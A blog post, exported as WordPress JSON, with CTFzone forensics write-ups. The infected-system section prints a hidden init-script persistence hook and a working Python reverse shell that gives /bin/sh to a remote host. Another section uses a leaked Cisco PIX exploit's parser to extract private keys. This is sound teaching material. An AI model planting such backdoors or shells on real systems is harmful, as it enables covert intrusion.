{"id":281495,"date":"2016-11-24T15:40:05","date_gmt":"2016-11-24T12:40:04","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=281495"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=281495","title":{"rendered":"CTFzone write-ups \u2013 First comes Forensics"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/4cb\/e22\/f87\/4cbe22f87a914e519e22fcf96b1b3a01.jpg\"\/><\/p>\n<p>  A few days have passed since BI.ZONE's CTFzone ended, and our smartphones are still buzzing nonstop with Telegram notifications \u2013 the chat with the participants of the battle became even livelier after the conference. According to the players, many of the CTFzone tasks were very unconventional and genuinely hard. 
During the competition we promised the participants that, as soon as our developers had caught up on sleep and recovered, we would publish write-ups for all of the tasks on our blog. <\/p>\n<p>  We start with the Forensics track, and in this article we present solutions to all of its tasks \u2013 from the 50-point task to the 1000-point one. 
We know that <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a> got ahead of us and has already posted write-ups for the 50- and 100-point tasks, but the tougher tasks will be harder \ud83d\ude09<\/p>\n<p>  <a name=\"habracut\"><\/a><br \/>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 50 \u2014 PCAP master<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i> <b>A.U.R.O.R.A.:<\/b> Lieutenant, how do you read me? You\u2019ve intercepted the traffic between the command server and the pilot\u2019s computer. Try to get the password from this traffic.<\/i><\/p><\/blockquote>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/a06\/211\/e00\/a06211e0066240a48db2d50bc4f9b95c.png\"\/><\/p>\n<p>  <b>Solution:<\/b><\/p>\n<p>  In this task the participant was given a PCAP traffic dump.<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/713\/a92\/c35\/713a92c3528c46f2ba3a9f7c3bd66c4e.png\"\/><\/p>\n<p>  As you have already guessed, the task was very simple and could be solved with a one-liner:<\/p>\n<p>  Command:   <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_50.pcap | grep &quot;pass&quot; <\/code><\/pre>\n<p>  Output:  <\/p>\n<pre><code class=\"bash\">7e6 GET \/?pass=ctfzone{b1@ckduck} HTTP\/1.1 <\/code><\/pre>\n<p>  <b>Answer:<\/b> <i>ctfzone{b1@ckduck}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 100 \u2014 Master of Strings<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Rise and shine, Lieutenant, stop dreaming of drinking vodka and playing with the bear. A.U.R.O.R.A. is speaking and it\u2019s time you stopped sleeping at your workplace. You can\u2019t idle your time anymore as the whole world might go down the drain unless, well\u2026 Let&#8217;s say it\u2019s time you are back in the game. The right man in the wrong place can change the world. 
So wake up, Lieutenant, find a password for the Spaceship panel and join the forces on Earth!<\/i><\/p><\/blockquote>\n<p>  The participant is given a RAM image that was captured at the moment of logging in to the spaceship's control panel:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/c90\/f23\/73e\/c90f2373ecde4557b799699d6c6f59d9.png\"\/><\/p>\n<p>  <b>Solution:<\/b><\/p>\n<p>  The first step was to extract all strings that contain \"pass=\".<\/p>\n<p>  Command:  <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_100.ram | grep --color &quot;pass=&quot; <\/code><\/pre>\n<p>  Output:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">94e1fa0 trovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\n1082e5c5   &lt;settings pass=&quot;windowsPE&quot; wasPassProcessed=&quot;true&quot;&gt;\n127c5776             pass=&quot;specialize&quot;\/&gt;\n155c83e8 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\n155c8828 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\n194c7e58 &lt;settings pass=&quot;\n1e11d387 login=Petrovich&pass=LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  This gives us the password \"LhUBEwwlAAJZIhQmGwYYAAF5MA%3D%3D\", but here it is obfuscated in some way (base64 is immediately recognizable). Next, we had to find the administration panel page that was left in memory:<\/p>\n<p>  Command:  <\/p>\n<pre><code class=\"bash\">strings -t x task_forensics_100.ram | grep --color &quot;&lt;html&gt;&quot; <\/code><\/pre>\n<p>  Output:  <\/p>\n<pre><code class=\"bash\">12f8240 &lt;html&gt;\n9bff780 &lt;html&gt;\n16934d20 &lt;html&gt;\n1b8ff4bd &lt;html&gt;\n1bc5c2c8 &lt;html&gt;\n1ed8f145 &lt;html&gt;\n<\/code><\/pre>\n<p>  Looking at offset \"12f8240\" reveals an HTML page:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">&lt;html&gt;\n&lt;head&gt;&lt;title&gt;Spaceship Panel&lt;\/title&gt;&lt;\/head&gt;\n  &lt;style&gt;\n    body {\n\tbackground-color: #2A191E;\n\tbackground-image: url(bd.png);\n\tbackground-repeat: no-repeat;\n\tbackground-size: 100%;\n    }\n    form {\n\twidth: 300px;\n\tmargin: 0 auto;\n    }\n  &lt;\/style&gt;\n&lt;script language=&quot;javascript&quot; type=&quot;text\/javascript&quot;&gt;\nfunction Magic(beard,water) {\n    var ord = []\n    var buf = &quot;&quot;\n    for (z = 1; z &lt;= 255; z++) {ord[String.fromCharCode(z)] = z}\n    for (j = z = 0; z &lt; beard.length; z++) {\n        buf += String.fromCharCode(ord[beard.substr(z, 1)] ^ ord[water.substr(j, 1)])\n        j = (j &lt; water.length) ? j + 1 : 0}\n    return buf\n}\nfunction b64EncodeUnicode(str) {\n return btoa(encodeURIComponent(str).replace(\/%([0-9A-F]{2})\/g, function(match, p1) {\n  return String.fromCharCode('0x' + p1);}));}\nfunction doLogin(){\n\t$a = document.myform.pass.value;\n\tdocument.myform.pass.value = b64EncodeUnicode(Magic($a,&quot;MagicKey&quot;));\n\tdocument.myform.submit();\n}\n&lt;\/script&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n&lt;center&gt;\n&lt;div class=&quot;center&quot;&gt;\n &lt;form name = 'myform' action = '#' method = 'post'&gt;\n  &lt;input id=&quot;login&quot; name = &quot;login&quot; placeholder=&quot;Login&quot; \/&gt;&lt;br&gt;\n  &lt;input id=&quot;pass&quot; name = &quot;pass&quot; placeholder=&quot;Password&quot; \/&gt;&lt;br&gt;\n  &lt;input onClick=&quot;doLogin(); return true;&quot; type=&quot;submit&quot; value=&quot;Login&quot;&gt;\n&lt;\/div&gt;\n&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  The page source shows that, before the password is sent, it is transformed by the function Magic(beard,water), which is an XOR operation with the key \"MagicKey\", and the result is then converted to base64. Next, we decode the password \"LhUBEwwlAAJZIhQmGwYYAAF5MA==\":  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">&lt;html&gt;\n&lt;script language=&quot;javascript&quot; type=&quot;text\/javascript&quot;&gt;\n\/\/ Magic() is copied unchanged from the recovered page: XOR with the same key undoes the encoding\nfunction Magic(beard,water) {\n    var ord = []\n    var buf = &quot;&quot;\n    for (z = 1; z &lt;= 255; z++) {ord[String.fromCharCode(z)] = z}\n    for (j = z = 0; z &lt; beard.length; z++) {\n        buf += String.fromCharCode(ord[beard.substr(z, 1)] ^ ord[water.substr(j, 1)])\n        j = (j &lt; water.length) ? j + 1 : 0}\n    return buf\n}\nfunction b64DecodeUnicode(str) {\n return decodeURIComponent(Array.prototype.map.call(atob(str), function(c) {\n  return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);}).join(''));}\nvar goo = Magic(b64DecodeUnicode(&quot;LhUBEwwlAAJZIhQmGwYYAAF5MA==&quot;), &quot;MagicKey&quot;);\nalert(goo);\n&lt;\/script&gt;\n&lt;\/html&gt;\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  The task contained a cheat (thanks, <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a>) that could be used with the \"strings.exe\" utility from Sysinternals.<\/p>\n<p>  <b>Answer:<\/b> <i>ctfzone{YouAreSexy}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 300 \u2014 Unlock Your Mind Power<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Lieutenant, looks like you are locked in the room. You don\u2019t want to stay here forever, do you? In order to open the door you should enter the code which was used to lock it. I\u2019ll give you a clue \u2014 you see a terminal over there? There is a diary next to the terminal which belongs to astronaut Nyota. It says that the door is connected to the control console. After Varvara locked the door, service engineer tinkered with this terminal. Examine this terminal and find a memory dump which may help you to find the right code. 
Good luck, Lieutenant, see you on the other side!<\/i><\/p><\/blockquote>\n<p>  <b>Solution:<\/b><\/p>\n<p>  The participant is given a RAM image. The intended way to start solving the task was with the \"Volatility Forensics\" tool, namely by getting the process list:<\/p>\n<pre><code class=\"bash\">.\/vol.py -f task_forensics_300\/MEMORY.DMP --profile=Win7SP1x86 pslist <\/code><\/pre>\n<p>  Output:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit\n---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------\n0x851c9020 System                    4      0     81      529 ------      0 2016-11-09 13:40:52 UTC+0000\n0x865a7ae0 smss.exe                240      4      2       29 ------      0 2016-11-09 13:40:52 UTC+0000\n0x86c474c8 csrss.exe               328    320      9      474      0      0 2016-11-09 13:41:00 UTC+0000\n0x86e1fd40 csrss.exe               368    360      9      226      1      0 2016-11-09 13:41:03 UTC+0000\n0x87029d40 wininit.exe             376    320      3       75      0      0 2016-11-09 13:41:03 UTC+0000\n0x8704d2b8 winlogon.exe            412    360      6      113      1      0 2016-11-09 13:41:03 UTC+0000\n0x870a8d40 services.exe            472    376      9      221      0      0 2016-11-09 13:41:04 UTC+0000\n0x87090030 lsass.exe               496    376      8      645      0      0 2016-11-09 13:41:07 UTC+0000\n0x87098d40 lsm.exe                 504    376     11      205      0      0 2016-11-09 13:41:07 UTC+0000\n0x87104d40 svchost.exe             600    472     12      360      0      0 2016-11-09 13:41:07 UTC+0000\n0x870cbb20 svchost.exe             668    472      7      271      0      0 2016-11-09 13:41:08 UTC+0000\n0x871076c8 svchost.exe             720    472     20      452      0      0 2016-11-09 13:41:08 UTC+0000\n0x871556c8 svchost.exe             824    472     19      442      0      0 2016-11-09 13:41:08 UTC+0000\n0x87163b18 svchost.exe             852    472     37     1034      0      0 2016-11-09 13:41:08 UTC+0000\n0x87173878 audiodg.exe             916    720      7      132      0      0 2016-11-09 13:41:09 UTC+0000\n0x871a66c8 svchost.exe            1004    472     15      526      0      0 2016-11-09 13:41:09 UTC+0000\n0x871c6030 svchost.exe            1112    472     23      519      0      0 2016-11-09 13:41:12 UTC+0000\n0x871e4d40 spoolsv.exe            1228    472     13      319      0      0 2016-11-09 13:41:13 UTC+0000\n0x87222d40 svchost.exe            1268    472     19      316      0      0 2016-11-09 13:41:13 UTC+0000\n0x87270278 vmicsvc.exe            1364    472      8      106      0      0 2016-11-09 13:41:13 UTC+0000\n0x87282558 vmicsvc.exe            1396    472      6      128      0      0 2016-11-09 13:41:13 UTC+0000\n0x8729b030 vmicsvc.exe            1424    472      4       66      0      0 2016-11-09 13:41:13 UTC+0000\n0x8729e4a0 vmicsvc.exe            1452    472      5       80      0      0 2016-11-09 13:41:13 UTC+0000\n0x87287648 vmicsvc.exe            1476    472      5       81      0      0 2016-11-09 13:41:13 UTC+0000\n0x872e68f0 taskhost.exe           1624    472      9      152      1      0 2016-11-09 13:41:14 UTC+0000\n0x87311030 vmtoolsd.exe           1740    472     10      283      0      0 2016-11-09 13:41:15 UTC+0000\n0x873176c8 dwm.exe                1816    824      6       71      1      0 2016-11-09 13:41:16 UTC+0000\n<\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  In the process list, \"mstsc.exe\" stands out \u2013 the RDP client of the Windows OS. 
Let's dump the memory of this process (all of its allocated memory, not just the executable):<\/p>\n<p>  Command:  <\/p>\n<pre><code class=\"bash\">.\/vol.py -f task_forensics_300\/MEMORY.DMP --profile=Win7SP1x86 memdump -p 2800 -D \/tmp\/<\/code><\/pre>\n<p>  Output:  <\/p>\n<pre><code class=\"bash\">Writing mstsc.exe [  2800] to 2800.dmp<\/code><\/pre>\n<p>  The natural next step would be to search the resulting dump for interesting strings, but nothing useful can be extracted from the strings, so let's move straight on to the next step. Let's try to recover the image from the RDP session. 
Searching Google for \"rdp image from memory\" turns up the blog post <a href=\"https:\/\/w00tsec.blogspot.ru\/2015\/02\/.html\">extracting raw pictures from memory<\/a>, which describes recovering an image from the mstsc.exe process with GIMP. The idea is simple \u2013 mstsc.exe keeps the picture from the remote computer in its memory (in RAW format). GIMP's preview mode can display this picture, but for that the image resolution has to be chosen correctly, otherwise it will look like noise. 
In fact, the image resolution must match the monitor resolution, and to tell the picture apart from noise it is enough to set the width to a divisor of the true image width and pick any height. 
We first tried a resolution of 640 pixels and found a picture:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/df5\/a37\/d94\/df5a37d944df4b72baf087cedab956c5.png\"\/>  <\/div>\n<\/div>\n<p>  Clearly, this data section of the file contains a picture, but the resolution has been chosen incorrectly. 
Let's try 1280:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/c58\/3ee\/685\/c583ee685d0848f5b47ad2a4ca518647.png\"\/>  <\/div>\n<\/div>\n<p>  An even better result is obtained with a little fine-tuning:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/ace\/a55\/6ab\/acea556ab2d44b569488ee024d4972d9.png\"\/><\/p>\n<p>  And there is the flag! <\/p>\n<p>  <b>Answer:<\/b> <i>ctfzone{7H3_p0w3r_0F_1mAG1Na710N}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 500 \u2014 Infected System<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>A.U.R.O.R.A.:<\/b> Lieutenant, system is infected, system is infected, system may be compromised! Lieutenant, what\u2019s happ&#8230;<\/i><\/p><\/blockquote>\n<p>  <b>Solution:<\/b><\/p>\n<p>  A great many people confuse the notions of \"partition\" and \"file system\". The 500-point task is about exactly that case. 
The image contains a DOS partition table with two logical partitions \u2013 Linux, which holds an Ext4 file system, and Linux Swap, which holds the swap area. If you mount the Ext4 file system, it is easy to spot the files of the Ubuntu 16.04.1 LTS operating system in it. That is where the easy part ends and the hard part begins. 
<br \/>  What happened to the system is unknown; the circumstances of the incident are shrouded in mystery. A search turns up the file \/etc\/init.d\/apache2, which contains a rather suspicious line: <\/p>\n<pre><code class=\"bash\">\/usr\/sbin\/mkinitrd read | base64 -d | python & <\/code><\/pre>\n<p>  A careful reading of the script shows that this line is always executed when the apache2 service starts. 
In the file \/usr\/sbin\/mkinitrd it is easy to find the code responsible for reading data from the device \/dev\/sda5 (which is the Linux Swap partition) at offset 966795264:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/bin\/sh\n\n[ $# -eq 1 ] || exit 1\n\ncheck_dep()\n{\n\tcmd=&quot;$1&quot;\n\tcommand -v &quot;$cmd&quot; &gt; \/dev\/null 2&gt; \/dev\/null\n}\n\ncheck_dd() # we don't want to use old versions of dd\n{\n\tdd if=\/dev\/zero of=\/dev\/null skip=1 count=1 iflag=skip_bytes 2&gt; \/dev\/null\n\tec=$?\n\t[ $ec -eq 0 ]\n}\n\ncheck_dep dd && check_dd || exit 3\n\ndevice=&quot;\/dev\/sda5&quot;\noffset=&quot;966795264&quot;\noperation=&quot;$1&quot;\n\nif   [ &quot;$operation&quot; = 'write' ]; then\n\tdd of=&quot;$device&quot; seek=&quot;$offset&quot; oflag=seek_bytes 2&gt; \/dev\/null\nelif [ &quot;$operation&quot; = 'read' ]; then\n\tdd if=&quot;$device&quot; skip=&quot;$offset&quot; iflag=skip_bytes 2&gt; \/dev\/null\nelse\n\texit 2\nfi\n<\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  If you read the data at that offset from the device \/dev\/sda5 and then decode it from Base64, 
you get a script written in Python that provides a backconnect shell to the host 192.168.12.98 (port 31338):  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">Hidden text<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"bash\">#!\/usr\/bin\/env python\n\nimport socket, subprocess, os\n\nHOST_PORT = ('192.168.12.98', 31338)\nFLAG = 'ctfzone{pwn3d-by-ns4_31337}'\n\nwhile True:\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    while True:\n        try:\n            errno = s.connect_ex(HOST_PORT)\n        except Exception:\n            continue\n\n        if errno == 0:\n            break\n\n    b_size = len(FLAG)\n    b = bytearray(b_size)\n\n    s.recv_into(b, b_size)\n    if str(b) == FLAG:\n        os.dup2(s.fileno(), 0)\n        os.dup2(s.fileno(), 1)\n        os.dup2(s.fileno(), 2)\n\n        p = subprocess.call(['\/bin\/sh', '-i'])\n\n    s.close()<\/code><\/pre>\n<\/div>\n<\/div>\n<p>  Before providing the shell, the script checks the password received from the server, and that password is the flag. 
How does this script keep working if it is placed in the partition that holds the swap area? 
The partition itself is 1071644672 bytes in size, while the swap area inside it is 236031 pages of 4096 bytes each, 966782976 bytes in total. That leaves 104861696 bytes (about 100 megabytes) between the end of the swap area and the end of the partition that holds it, and nothing but the backdoor uses them. 
Consequently, this region can hold data that will not be overwritten by the memory manager during swapping.<\/p>\n<p>  <b>Answer:<\/b> <i>ctfzone{pwn3d-by-ns4_31337}<\/i><\/p>\n<p>  <font color=\"#6495ED\"><b><\/p>\n<h4>Forensics 1000 \u2014 Have I been pwned?<\/h4>\n<p><\/b><\/font>  <\/p>\n<blockquote><p><i><b>Captain Picard:<\/b> Lieutenant, be careful, Big Brother is watching you\u2026<\/i><\/p><\/blockquote>\n<p>  <b>Solution:<\/b><\/p>\n<p>  The participant is given a PCAP traffic dump. The 1000-point tasks were prepared with particular care, because we wanted to come up with something interesting and topical. 
For the Forensics track we decided to build a task around the recent leak of the BENIGNCERTAIN exploit for CISCO PIX. Exploiting BENIGNCERTAIN yields a large part of the CISCO PIX configuration, including private keys that make it possible to decrypt traffic.<\/p>\n<p>  First, you need to find the ISAKMP packets:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/407\/bc6\/b01\/407bc6b0128146d384e68b4b70e0d0be.png\"\/><\/p>\n<p>  The packet from 10.1.3.52 is the payload that was generated with 
\"bc-genpkt\":<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/d05\/994\/fe9\/d05994fe91214f4e86c12caeb6a0871e.png\"\/><\/p>\n<p>  The packet from the host \"10.1.2.12\", in turn, is the part of the configuration that the PIX returns as a result of the vulnerability being exploited:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/90e\/703\/737\/90e703737eaa49cb86291e98cd5583e0.png\"\/><\/p>\n<p>  Obviously, we are interested in the packet coming from the CISCO PIX, because it contains the \"Private Key\". 
Save the ISAKMP packet coming from 10.1.2.12 in \"raw\" format and pass it as an argument to the \"bc-parser\" utility, which ships with <a href=\"https:\/\/github.com\/adamcaudill\/EquationGroupLeak\/tree\/master\/Firewall\/TOOLS\/BenignCertain\/\">EquationGroupLeak<\/a>.<\/p>\n<p>  Command:  <\/p>\n<pre><code class=\"bash\">.\/bc-parser packet.raw <\/code><\/pre>\n<p>  Result:  <\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">bc-parser<\/b><\/p>\n<div class=\"spoiler_text\">BENIGNCERTAIN parser v1.0<\/p>\n<p>  Parsing file packet<\/p>\n<p>  Possible PIX version(s):<\/p>\n<p>  Cisco PIX 6.3(4)<\/p>\n<p>  *** Couldn&#8217;t determine interface used by BENIGNCERTAIN ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Stack separator structure at offset 0x0254, size 0x98 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  ISAKMP enable structure at offset 0x02ec, size 0x218 bytes:<\/p>\n<p>  *** ISAKMP enabled on 1 interface ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x0504, size 0x30 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  ISAKMP policy structure at offset 0x0534, size 0x38 bytes (1 of at least 1 policies):<\/p>\n<p>  Priority: 0x000a [10]<br \/>   
Cipher: 0x0007 [AES]<br \/>   AES keysize: 0x0100 [256-bits]<br \/>   Auth: 0x0003 [RSA signature]<br \/>   Hash: 0x0002 [SHA]<br \/>   Group: 0x0002 [1024-bit]<br \/>   Lifetime: 0x00015180 [86400 seconds]<\/p>\n<p>  =======================================================================<\/p>\n<p>  VPN group structure at offset 0x056c, size 0x600 bytes (1 of 1 groups):<\/p>\n<p>  Group name: 12345<br \/>   Pool name: vpnpool1<br \/>   Domain name: spaceship.ctf<br \/>   Password: 12345<br \/>   Primary DNS: 192.168.7.1 <br \/>   Primary WINS: 192.168.7.1 <br \/>   Idle-time: 0x00000708 [1800 seconds]<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x0b6c, size 0x28 bytes:<\/p>\n<p>  String: listen\/ssh_0<\/p>\n<p>  =======================================================================<\/p>\n<p>  Per-thread stack structure at offset 0x0b94, size 0x818 bytes:<\/p>\n<p>  *** Target allows SSH access (on port 22) ***<br \/>   *** on the outside interface ***<\/p>\n<p>  *** Couldn&#8217;t determine the interface used by BC ***<\/p>\n<p>  =======================================================================<\/p>\n<p>  Stack separator structure at offset 0x13ac, size 0x98 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  IP\/netmask structure at offset 0x1444, size 0x30 bytes:<\/p>\n<p>  IP Address: 10.0.0.0<br \/>   Netmask: 255.0.0.0<\/p>\n<p>  IP\/netmask probably associated with preceding thread<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x1474, size 0x30 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  Unknown structure at offset 0x14a4, size 0x40 bytes:<\/p>\n<p>  =======================================================================<\/p>\n<p>  Hostname structure at offset 0x14e4, size 0x30 bytes:<\/p>\n<p>  
Possible hostname: privateVPN.spaceship.ctf<\/p>\n<p>  =======================================================================<\/p>\n<p>  RSA private key structure at offset 0x1514, size 0x4d8 bytes:<\/p>\n<p>  *** Found probable RSA private key ***<\/p>\n<p>  To validate the RSA key using &#8216;openssl&#8217;:<\/p>\n<p>  openssl rsa -inform DER -text -noout -check \\<br \/>   -in packet.rsa_priv_1.der<\/p>\n<p>  =======================================================================<\/p>\n<p>  RSA public key structure at offset 0x19ec, size 0x140 bytes:<\/p>\n<p>  *** Found probable RSA public key ***<\/p>\n<p>  To validate the RSA key using &#8216;openssl&#8217;:<\/p>\n<p>  openssl rsa -inform DER -text -noout -pubin \\<br \/>   -in packet.rsa_pub_1.der<\/p>\n<p>  =======================================================================<\/p>\n<p>  *** Partial structure at offset 0x1b2c (0x86c of 0x2018 bytes):<\/p>\n<p>  [Not parsed]<\/p>\n<p>  =======================================================================<\/p>\n<p>  &lt;&lt;&lt;&lt;&gt;&gt;&gt;&gt;<\/p><\/div>\n<\/div>\n<p>  Look at the contents of the DER file:<\/p>\n<p>  Command:  <\/p>\n<pre><code class=\"bash\">openssl rsa -inform DER -text -in packet.rsa_priv_1.der <\/code><\/pre>\n<p>  Result:  <\/p>\n<p>  We only need the key:  <\/p>\n<p>  Load the key into Wireshark and look at the traffic after decryption (Preferences -&gt; Protocols -&gt; SSL -&gt; RSA keys list -&gt; Edit -&gt;):<\/p>\n<pre><code class=\"bash\">IP address: 10.1.2.15 Port:1337 Protocol: Data 
Key File: &lt;private key&gt; Password: &lt;password&gt; <\/code><\/pre>\n<p>  Next, analyze the contents of the TLS packets:<\/p>\n<p>  <img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/78a\/9ae\/113\/78a9ae113b0d4f9cad03280df80c91a8.png\"\/><\/p>\n<p>  Done!<\/p>\n<p>  <b>Answer:<\/b> <i>ctfzone{ControlIsAnI11us10n}<\/i><\/p>\n<p>  That is roughly how you could earn 1950 points for forensics. If anything is unclear, ask your questions in the comments or on <a href=\"https:\/\/telegram.me\/joinchat\/Aj-l2UC2XdOvF_ogMsQE0w\">Telegram<\/a>; we are available day and night!<\/p>\n<p>  Write-ups for the other tracks will also appear on our blog soon, so stay tuned for 
updates. In the meantime, you can put your new knowledge to use at this <a href=\"https:\/\/tasks.bi.zone\">link<\/a>, where there happens to be plenty of forensics \ud83d\ude09<br \/> link to the original article <a href=\"https:\/\/habrahabr.ru\/post\/315954\/\"> https:\/\/habrahabr.ru\/post\/315954\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/4cb\/e22\/f87\/4cbe22f87a914e519e22fcf96b1b3a01.jpg\"\/><\/p>\n<p>  A few days have passed since the end of CTFzone by BI.ZONE, and our smartphones are still blowing up with Telegram notifications: the chat with the participants of the battle became even livelier after the conference. 
According to the players' feedback, many CTFzone tasks were highly unconventional and genuinely difficult. During the competition we promised the participants that, as soon as our developers had caught up on sleep and recovered, we would publish write-ups for all the tasks on our blog. <\/p>\n<p>  We start with the Forensics track, and in this article we present solutions to all of its tasks, from the 50-point one to the 1000-point one. 
We know that <a href=\"https:\/\/habrahabr.ru\/users\/hackzard\/\" class=\"user_link\">hackzard<\/a> beat us to it and has already published write-ups for the 50- and 100-point tasks, but the tougher tasks will be harder \ud83d\ude09<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-281495","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281495","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281495"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/281495\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281495"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281495"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv
2%2Ftags&post=281495"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}